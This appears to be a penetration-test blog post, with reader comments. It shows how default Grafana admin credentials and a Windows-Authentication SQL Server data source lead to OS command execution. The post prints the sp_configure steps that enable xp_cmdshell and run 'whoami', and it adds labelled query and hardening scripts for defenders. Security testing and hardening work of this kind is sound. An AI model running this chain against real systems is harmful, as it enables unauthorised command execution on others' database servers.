Grafana Remote Command Execution Through Microsoft SQL Server

A few days ago I was conducting an internal penetration test for a mid-size company when I came across a Grafana (v10) instance with default admin credentials, listening on tcp/3000 as usual.

In a bug bounty programme, default credentials are the point at which you stop and report; a penetration test gives you the freedom to dive deeper and exploit the finding.

Grafana dashboard after successful authentication

After logging in with the default admin:admin credentials, I started searching for known ways to get code execution in Grafana with admin privileges.

Unfortunately, I found nothing relevant to my case, so I started looking around.

It is worth mentioning that Grafana was installed on a Windows machine. A quick nmap scan revealed a few more interesting open ports.

Nmap results on the target machine

The first was Prometheus on tcp/9090, and the second was Microsoft SQL Server on tcp/1433.

As you may know, Grafana lets you add many different data sources, including Elasticsearch, GitLab, Jira and others.

Fortunately for me, Microsoft SQL Server was among the available data sources. The only problem was that I had no credentials for the SQL Server instance.

Adding a new data source in Grafana

But, as I found out, you do not need a username and password at all to connect to Microsoft SQL Server in this setup.

When Grafana runs on Windows and the SQL Server instance accepts Windows Authentication (integrated security), the data source can authenticate with the Windows identity of the Grafana service process itself instead of a SQL login and password. If that account, commonly Local System or a dedicated service account, has a login on the instance, the connection succeeds and every query Grafana sends runs with that login's privileges. The Grafana admin never needs to know any database credentials.

Adding the local Microsoft SQL Server as a data source

So I quickly added a new SQL Server data source and filled in the necessary fields, including host and database name, and, most importantly, set the authentication type to Windows Authentication.

The connection succeeded, and from that point I could run arbitrary SQL queries from the Grafana query editor.

Executing a query on SQL Server from the Grafana dashboard
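Before touching any server configuration, a tester (or a defender reproducing the finding) wants to know exactly which Windows identity the Grafana service presented and whether that login can reach sp_configure at all. The following T-SQL is an added example and is not part of the original post; it uses only built-in functions and catalog views and assumes nothing beyond a connection established through the Grafana MSSQL data source with Windows Authentication.

```sql
-- Added example: identity and privilege check run through the Grafana query editor.
-- Who did the Grafana service authenticate as, and what can that login do?
SELECT
    SUSER_SNAME()                                   AS windows_login,       -- e.g. NT AUTHORITY\SYSTEM or a service account
    ORIGINAL_LOGIN()                                AS original_login,      -- differs from SUSER_SNAME() only under impersonation
    IS_SRVROLEMEMBER('sysadmin')                    AS is_sysadmin,         -- 1 = full control of the instance
    HAS_PERMS_BY_NAME(NULL, NULL, 'ALTER SETTINGS') AS can_alter_settings,  -- 1 = sp_configure / xp_cmdshell within reach
    @@SERVERNAME                                    AS server_name,
    SERVERPROPERTY('ProductVersion')                AS product_version;

-- State of the two switches the attack depends on (value_in_use = 1 means enabled).
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- Account the SQL Server service itself runs as: this is the identity an
-- xp_cmdshell command would execute under (requires VIEW SERVER STATE).
SELECT servicename, service_account, status_desc
FROM sys.dm_server_services
WHERE servicename LIKE 'SQL Server (%';
```

If the editor renders only the first result set of a query, run the three statements as separate queries. A result of is_sysadmin = 0 and can_alter_settings = 0 means the sp_configure route described below will fail with a permission error, which is exactly the condition a hardened deployment should produce.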

The final step was to enable the xp_cmdshell extended stored procedure, which is disabled by default and can only be turned on by a login holding ALTER SETTINGS (in practice, a sysadmin). The Windows identity Grafana had connected with evidently held that right, because the following ran without error:

-- Expose the advanced options so xp_cmdshell becomes configurable (requires ALTER SETTINGS)
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
-- Enable xp_cmdshell (off by default since SQL Server 2005)
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
-- Run an OS command; it executes as the SQL Server service account
EXEC master..xp_cmdshell 'whoami';

Now we are good to go!

Executing the whoami command on Windows
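The same switches, seen from the defender's side. This T-SQL is an added example and not from the original post: it returns xp_cmdshell to its default, lists the Windows logins that hold sysadmin (a Grafana service account appearing in that list is the root cause of the finding above), and shows the least-privilege alternative. The login name CONTOSO\svc_grafana and the database ReportingDB are hypothetical placeholders; substitute the real service account and the database Grafana actually needs to read.

```sql
-- Added example: undo the configuration change and remove the privilege that made it possible.

-- 1. Put xp_cmdshell back to its default (disabled) and hide the advanced options again.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';          -- expect value_in_use = 0

-- 2. Inventory Windows logins and groups that are members of sysadmin.
--    Any service (Grafana included) running under one of these accounts can
--    re-enable xp_cmdshell exactly as shown above, so this list is the real exposure.
SELECT sp.name AS login_name, sp.type_desc, sp.is_disabled
FROM sys.server_principals AS sp
JOIN sys.server_role_members AS rm ON rm.member_principal_id = sp.principal_id
JOIN sys.server_principals AS r   ON r.principal_id = rm.role_principal_id
WHERE r.name = 'sysadmin'
  AND sp.type IN ('U', 'G')          -- U = Windows login, G = Windows group
ORDER BY sp.name;

-- 3. Least privilege for the Grafana service account (hypothetical names):
--    drop it from sysadmin and grant read-only access to the one database it reports on.
ALTER SERVER ROLE sysadmin DROP MEMBER [CONTOSO\svc_grafana];
USE ReportingDB;
CREATE USER [CONTOSO\svc_grafana] FOR LOGIN [CONTOSO\svc_grafana];
ALTER ROLE db_datareader ADD MEMBER [CONTOSO\svc_grafana];
```

Disabling xp_cmdshell on its own is cosmetic: a sysadmin login can switch it back on with the same two sp_configure calls. The durable fixes are step 3 (the Grafana service account must not be sysadmin, and should not share a host-wide identity such as Local System with SQL Server) together with changing the Grafana admin password, which is where the chain started.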

Thanks for reading! Don't forget to subscribe to my blog on Medium.

I will leave the link in the comments.


Florian Viard

Database Administrator at Mercuria Energy Trading S.A.

1 year ago

With appropriate security configuration on the database, it's impossible.

Reply
Vahagn Israelian

I hack web apps & networks. Expert in External Penetration Testing, Web Application Security, Vulnerability Assessment & Source Code Review. Ethical Hacker, Pentester, SRT Member, Bug Hunter

1 year ago

More articles to come soon: https://medium.com/@konqi

Reply
